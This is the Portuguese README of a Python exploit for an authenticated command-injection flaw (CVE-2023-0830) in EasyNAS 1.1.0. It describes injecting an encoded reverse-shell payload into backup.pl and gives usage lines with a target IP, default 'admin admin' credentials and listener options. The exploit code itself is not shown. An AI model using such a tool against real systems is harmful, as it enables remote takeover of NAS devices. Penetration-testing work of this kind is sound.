
Exploit para EasyNAS versão 1.1.0. A vulnerabilidade explorada é uma falha de injeção de comandos, que requer autenticação.
Este script Python é um exploit poderoso para o EasyNAS versão 1.1.0 com funcionalidades aprimoradas, incluindo um listener integrado. A vulnerabilidade explorada é uma falha de injeção de comandos que requer autenticação.
O script estabelece uma sessão com o servidor alvo e, em seguida, envia uma requisição de login com as credenciais fornecidas pelo utilizador. Após autenticação bem-sucedida, o script constrói um payload que, quando executado, abre uma conexão reverse shell para um IP e porta especificados pelo utilizador. Este payload é codificado em URL e Base64 e, em seguida, injetado no ficheiro backup.pl no servidor através de uma requisição GET cuidadosamente elaborada.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Modo de exploração: shell (reverse shell integrado) ou reverse (listener externo)
--lhost IP_ADDRESS Endereço IP para o listener do reverse shell (detetado automaticamente por padrão)
--lport PORT Porta para o listener do reverse shell (padrão: 4444)
--protocol {http,https} Protocolo a utilizar (padrão: https)
--verbose Ativar saída detalhada
--shell {bash,sh,python} Especificar o tipo de shell a usar com o listener integrado (padrão: bash)
Este script é apenas para fins educacionais e testes de penetração autorizados. Sempre obtenha permissão explícita antes de executar qualquer teste de penetração contra uma rede ou sistema.
Por favor, use com responsabilidade.